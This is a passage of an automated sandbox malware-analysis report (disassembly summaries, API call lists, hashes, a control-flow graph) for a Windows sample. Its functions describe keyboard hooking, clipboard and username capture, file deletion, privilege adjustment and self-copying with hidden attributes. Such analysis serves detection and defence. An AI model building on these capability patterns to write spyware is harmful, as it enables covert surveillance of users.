                                • Part of subcall function 004022EA: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 004023B8
                                • Part of subcall function 004022EA: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,0000000F,6A3F5E04), ref: 004023CE
                                • Part of subcall function 004022EA: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004023D8
                                • Part of subcall function 004022EA: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004023E1
                                • Part of subcall function 004022EA: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,?), ref: 004023F2
                                • Part of subcall function 004022EA: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004023FC
                                • Part of subcall function 004022EA: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402405
                                • Part of subcall function 004022EA: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402419
                              • free.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 004022AE
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 004022D0
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040A628,0040A71E,00000001), ref: 004022D9
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$V01@@$??1?$basic_string@V01@$??0?$basic_string@??4?$basic_string@$D@1@@$??9std@@?substr@?$basic_string@D@2@@0@V12@V?$basic_string@$?c_str@?$basic_string@?data@?$basic_string@?length@?$basic_string@?size@?$basic_string@Y?$basic_string@freemallocrecv
                              • String ID:
                              • API String ID: 2200674315-0
                              • Opcode ID: a6d19df7b26a596a4de367439ba62f5d2f94adbaaf081c4d5c5af70b61a6c544
                              • Instruction ID: efd5f749c13a253eb37fde81f2b1e2490532d806b03320675b530293b808823e
                              • Opcode Fuzzy Hash: a6d19df7b26a596a4de367439ba62f5d2f94adbaaf081c4d5c5af70b61a6c544
                              • Instruction Fuzzy Hash: B8211D3250050AAFCB11DBA0DE4DAEEB779FF54309F10407AF406A2190DBB59E49CB28
                              Function 0040F234 Relevance: 13.7, APIs: 9, Instructions: 186fileCOMMON
                              Download Yara Rule
                              APIs
                              • FindFirstFileA.KERNEL32(?,?,00415918,00410668,76F93520), ref: 0040F2F5
                              • FindNextFileA.KERNEL32(0040E4BC,?), ref: 0040F33C
                              • SetFileAttributesA.KERNEL32(?,00000080), ref: 0040F3F6
                              • DeleteFileA.KERNEL32(?), ref: 0040F403
                                • Part of subcall function 0040F234: RemoveDirectoryA.KERNEL32(?), ref: 0040F3B1
                              • GetLastError.KERNEL32 ref: 0040F40F
                              • FindClose.KERNEL32(0040E4BC), ref: 0040F42B
                              • RemoveDirectoryA.KERNEL32(0040E4BC), ref: 0040F434
                              • FindClose.KERNEL32(0040E4BC), ref: 0040F442
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                              • String ID:
                              • API String ID: 2341273852-0
                              • Opcode ID: bda2e7eeef083443b7bd4fac117ae406248ac067903fb5d96853e11b5ddda6fa
                              • Instruction ID: c9d715fef9de8b24144a52c82442ab3d42063f8e50258a23890eccb11d7ae604
                              • Opcode Fuzzy Hash: bda2e7eeef083443b7bd4fac117ae406248ac067903fb5d96853e11b5ddda6fa
                              • Instruction Fuzzy Hash: 5151B636A0050C4BCF28CA749C446EEB7A6BBD4310F5485B9E806E76D0DEB99E8D8A44
                              Function 0040CA41 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentProcess.KERNEL32(00000028,?,00415268), ref: 0040CA4E
                              • OpenProcessToken.ADVAPI32(00000000), ref: 0040CA55
                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040CA67
                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0040CA86
                              • GetLastError.KERNEL32 ref: 0040CA8C
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                              • String ID: SeShutdownPrivilege
                              • API String ID: 3534403312-3733053543
                              • Opcode ID: 48c1e8d5093e11796e88808fd98121dfa36cb171cdc9d53d0fc18bf8e136cc78
                              • Instruction ID: b55852355777b42c5cafdc737e44021a98442e900811cd24b975246bc46e5c25
                              • Opcode Fuzzy Hash: 48c1e8d5093e11796e88808fd98121dfa36cb171cdc9d53d0fc18bf8e136cc78
                              • Instruction Fuzzy Hash: 6DF05871801129BBDB00ABA1ED0DEEF7EBCEF09358F104020B506E2090C6B45A88CBB5
                              Function 0040E549 Relevance: 9.0, APIs: 6, Instructions: 41COMMON
                              Download Yara Rule
                              APIs
                              • GetUserNameW.ADVAPI32(?,?), ref: 0040E57B
                              • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00411848,?,?), ref: 0040E594
                              • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040E5A3
                              • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(00000010,00000000), ref: 0040E5AF
                              • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040E5BA
                              • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040E5C3
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??1?$basic_string@G@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@G@1@@NameUserV10@V10@@
                              • String ID:
                              • API String ID: 3382107156-0
                              • Opcode ID: 98fc6973e258bf046ee6ab017d8c874cfade209d0468d1f87d8a2fe65baca8c3
                              • Instruction ID: f1d4da816d663859cec578e5c7d94290c2f1c89324f161e9baf60459a55de7f2
                              • Opcode Fuzzy Hash: 98fc6973e258bf046ee6ab017d8c874cfade209d0468d1f87d8a2fe65baca8c3
                              • Instruction Fuzzy Hash: 90018CB5C0110DABDB11DB94EC49EDE7B7CEB08304F108176F915E2191EB74A68DCBA4
                              Function 00408150 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 24COMMON
                              Download Yara Rule
                              APIs
                              • FindResourceA.KERNEL32(00000000,SETTINGS,0000000A), ref: 0040815E
                              • LoadResource.KERNEL32(00000000,00000000,?,?,?,00407C6C,00000000,?,?,00000000), ref: 00408169
                              • LockResource.KERNEL32(00000000,?,?,?,00407C6C,00000000,?,?,00000000), ref: 00408170
                              • SizeofResource.KERNEL32(00000000,00000000,?,?,?,00407C6C,00000000,?,?,00000000), ref: 0040817B
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: Resource$FindLoadLockSizeof
                              • String ID: SETTINGS
                              • API String ID: 3473537107-594951305
                              • Opcode ID: 4a4f9f9fedebf4e8c05053aceb2eda3fc10e4a3aaeaffec35722cfdb0d535c0a
                              • Instruction ID: 01db6dd320cb8d17c195901b687e59d16bc98a51b3a2c1f815eadbb7ce5068f8
                              • Opcode Fuzzy Hash: 4a4f9f9fedebf4e8c05053aceb2eda3fc10e4a3aaeaffec35722cfdb0d535c0a
                              • Instruction Fuzzy Hash: C9E0BF35680314BBD6201BA5BC0DF977E68EB8AB62F004025F70DC6190DAB1444087A5
                              Function 00403877 Relevance: 7.5, APIs: 5, Instructions: 44windowCOMMON
                              Download Yara Rule
                              APIs
                              • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040388F
                              • SetWindowsHookExA.USER32(0000000D,0040385C,00000000), ref: 0040389D
                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004038B2
                              • TranslateMessage.USER32(?), ref: 004038BC
                              • DispatchMessageA.USER32(?), ref: 004038C6
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: Message$DispatchHandleHookModuleTranslateWindows
                              • String ID:
                              • API String ID: 521483645-0
                              • Opcode ID: 9f2d6cb336974f6d21199ad434600dc08e561f79de4f796117326006807f6229
                              • Instruction ID: 353822e126b8fa7368d95cd0bef129b561c7f90acebca083c61d1e8d62fd4680
                              • Opcode Fuzzy Hash: 9f2d6cb336974f6d21199ad434600dc08e561f79de4f796117326006807f6229
                              • Instruction Fuzzy Hash: 7CF04473900149BBD720AFA59C48DEB7FFCEBC5B11B00847ABA41E2154D6789545CB74
                              Function 0040E4C4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 8libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 0040E4D3
                              • GetProcAddress.KERNEL32(00000000), ref: 0040E4DA
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressLibraryLoadProc
                              • String ID: GetLastInputInfo$User32.dll
                              • API String ID: 2574300362-1519888992
                              • Opcode ID: 2e41d0d454fa43021efc0d210194af18c12e8c2f34d28340e7a9680a4206e5ea
                              • Instruction ID: c49a19daebca9e066ce9d428bbfec3a7347074465f3c8db43cf9aeb53f5350e0
                              • Opcode Fuzzy Hash: 2e41d0d454fa43021efc0d210194af18c12e8c2f34d28340e7a9680a4206e5ea
                              • Instruction Fuzzy Hash: 6CC092B49A0600BFC7012FB2ED0DAD83AA4A684702724C436B20AE21B4CBBD50C1DA6D
                              Function 004050FC Relevance: 6.0, APIs: 4, Instructions: 27clipboardCOMMON
                              Download Yara Rule
                              APIs
                              • OpenClipboard.USER32(00000000), ref: 00405103
                              • GetClipboardData.USER32(00000001), ref: 0040510F
                              • CloseClipboard.USER32 ref: 00405117
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00410668,?,?,00405184,?,?,00000000,76F90F00,?,?,?,?,?,00404196), ref: 00405134
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: Clipboard$V?$allocator@$??0?$basic_string@CloseD@1@@D@2@@std@@D@std@@DataOpenU?$char_traits@
                              • String ID:
                              • API String ID: 1727351239-0
                              • Opcode ID: 53859871c346f8d909a8a4067bc2c69c3a6e0e0f248ca5fb0bf1a49c13e3f3f4
                              • Instruction ID: 906847f47c7b4b11390f21f1ccf552f120e036e9c6eec0ef59ca3d1b5a3ea75f
                              • Opcode Fuzzy Hash: 53859871c346f8d909a8a4067bc2c69c3a6e0e0f248ca5fb0bf1a49c13e3f3f4
                              • Instruction Fuzzy Hash: E6E06D75A41218BFD7409B50DC49FEFBBACEB48B41F008132BD05EA280D7B49981CAA8
                              Function 0040818A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                              Download Yara Rule
                              APIs
                              • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,0040A1F9,?,00415268,00415968,00415268,00415B08,00415268,00000000,00415268,1.7 Pro), ref: 0040819B
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,?,0040A1F9,?,00415268,00415968,00415268,00415B08,00415268,00000000,00415268,1.7 Pro,00415268,?), ref: 004081AC
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$??0?$basic_string@D@1@@D@2@@std@@D@std@@InfoLocaleU?$char_traits@
                              • String ID: hRA
                              • API String ID: 4090406865-819137882
                              • Opcode ID: e3e50d6bbcdab5c93a1ca4425c6ccadb35c0c4967b2e4fa0870170a0cdf04c02
                              • Instruction ID: 1a47b6e8894e7d79e7ab4b57d9db25869eba35aadfc9e332033dbe3f11390d94
                              • Opcode Fuzzy Hash: e3e50d6bbcdab5c93a1ca4425c6ccadb35c0c4967b2e4fa0870170a0cdf04c02
                              • Instruction Fuzzy Hash: 2EE0127560020DFBDB40CB90DC45FCE77BCEB08749F004051BA06D7190D6B0EB488B50
                              Function 004038DB Relevance: 4.6, APIs: 3, Instructions: 63keyboardCOMMON
                              Download Yara Rule
                              APIs
                              • GetKeyState.USER32(00000014), ref: 0040392F
                              • GetKeyState.USER32(00000014), ref: 00403938
                                • Part of subcall function 00404FDE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00410A64,?), ref: 0040505E
                              • CallNextHookEx.USER32(?,00000000,?,?), ref: 0040397B
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: StateV?$allocator@$??0?$basic_string@CallD@1@@D@2@@std@@D@std@@HookNextU?$char_traits@
                              • String ID:
                              • API String ID: 98962008-0
                              • Opcode ID: 2719df795b598792e02b9cd92bb9d782a1042e2cb6b283e7d445e30c5fd2cdbc
                              • Instruction ID: 016176dd5e4550907043258ced9a7594ac35f6d0ba92dea6ea93643b686b713f
                              • Opcode Fuzzy Hash: 2719df795b598792e02b9cd92bb9d782a1042e2cb6b283e7d445e30c5fd2cdbc
                              • Instruction Fuzzy Hash: 6611DDB220020987DF00AF35CC80BAF3A199B48355F00403EAA423A2D3CABD8D149B9E
                              Function 00401102 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: hXMV$hXMV
                              • API String ID: 0-400149659
                              • Opcode ID: 32d6da195fab9a79b0a2790fc5938e76e7787eb2c00dcb82f7320fa8a259af23
                              • Instruction ID: eaa8797a659175eabba1fc64c3000a1aeaf6329f201fbe84486763329dbd0212
                              • Opcode Fuzzy Hash: 32d6da195fab9a79b0a2790fc5938e76e7787eb2c00dcb82f7320fa8a259af23
                              • Instruction Fuzzy Hash: 67F0F672E08789ABD7048759DD92BAFFBB8E745B20F30463AF021636C1D27919018AA0
                              Function 0040374A Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                              Download Yara Rule
                              APIs
                              • GetKeyboardLayout.USER32(00000000), ref: 0040374F
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: KeyboardLayout
                              • String ID:
                              • API String ID: 194098044-0
                              • Opcode ID: 7a138c4a33ac2ea2e17b4cf10e9ffc2fbbddba362a0710cd35810d1b16c1cc02
                              • Instruction ID: 2df3cf34392ab381e4f069577e8eaff7fdb13a446b1c8ff3861ab48797279b8b
                              • Opcode Fuzzy Hash: 7a138c4a33ac2ea2e17b4cf10e9ffc2fbbddba362a0710cd35810d1b16c1cc02
                              • Instruction Fuzzy Hash: 59D0A7B794A3200EF6A4BB6CBA427E13784EB50B21F85903FE5801BAC8D4E469C20658
                              Function 004011A3 Relevance: .0, Instructions: 16COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: bba3e4718dbdc75b72417a0249ace700e515a5928d43ceadd18bfbdad54d5587
                              • Instruction ID: 1364cb1d12eabb9626d35066541146f39bd6914f24beff9e251c0f817e1c4944
                              • Opcode Fuzzy Hash: bba3e4718dbdc75b72417a0249ace700e515a5928d43ceadd18bfbdad54d5587
                              • Instruction Fuzzy Hash: D0D05E70611144EBCB04CB58C94574E76F8A705744F604865D001EB290C278EE40E704
                              Function 0040650D Relevance: 138.6, APIs: 70, Strings: 9, Instructions: 368fileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 915 40650d-406526 916 406528-40657b ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ CreateDirectoryA ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z * 2 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 915->916 917 40657d-40659d call 40712f ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z 915->917 918 4065a0-4065b3 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ 916->918 917->918 921 4065b5-4065bb 918->921 922 4065d7-4065d9 921->922 923 4065bd-4065bf 921->923 926 4065dc-4065de 922->926 924 4065c1-4065c9 923->924 925 4065d3-4065d5 923->925 924->922 929 4065cb-4065d1 924->929 925->926 927 4065e0-406614 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 406339 926->927 928 406619-40662d ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ CopyFileA 926->928 937 406983-406987 927->937 931 4066e3-406719 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 406339 928->931 932 406633-406637 928->932 929->921 929->925 940 40671b-40673b ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ SetFileAttributesA 931->940 941 40674d-4067d3 getenv ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z 931->941 932->931 934 40663d-40664b 932->934 938 40669d-4066b4 call 40712f ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z 934->938 939 40664d-40669b call 40712f ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z * 2 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 934->939 951 4066b7-4066d1 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ CopyFileA 938->951 939->951 940->941 944 40673d-40674b ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ SetFileAttributesA 940->944 945 406878-406965 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z * 2 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z * 2 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 6 ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z * 2 ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ ShellExecuteA 941->945 946 4067d9-406872 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z * 2 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z * 2 ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 6 941->946 944->941 949 406967-406968 exit 945->949 950 40696e-40697d ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 945->950 946->945 949->950 950->937 951->931 952 4066d3-4066de ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z 951->952 952->937
                              APIs
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00415968,00000000,00415940), ref: 0040652E
                              • CreateDirectoryA.KERNEL32(00000000), ref: 00406535
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00415918,004108CC,?), ref: 0040654C
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?), ref: 00406559
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?), ref: 00406569
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 00406572
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00415968,00000000,00415940), ref: 00406597
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 004065A0
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?), ref: 004065A8
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 004065E5
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040661D
                              • CopyFileA.KERNEL32(0041580C,00000000), ref: 00406625
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(00000001,00000000,?,?,?,?,004108CC,?), ref: 00406668
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,004108CC,?), ref: 00406675
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,004108CC,?), ref: 00406680
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,004108CC,?), ref: 00406689
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,004108CC,?), ref: 00406692
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004066AE
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,004108CC,?), ref: 004066B7
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004066C1
                              • CopyFileA.KERNEL32(0041580C,00000000), ref: 004066C9
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(0041580C), ref: 004066D6
                                • Part of subcall function 0040712F: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040713F
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 004066E8
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000007), ref: 0040671F
                              • SetFileAttributesA.KERNEL32(00000000), ref: 0040672C
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000007), ref: 00406744
                              • SetFileAttributesA.KERNEL32(00000000), ref: 0040674B
                              • getenv.MSVCRT ref: 0040675B
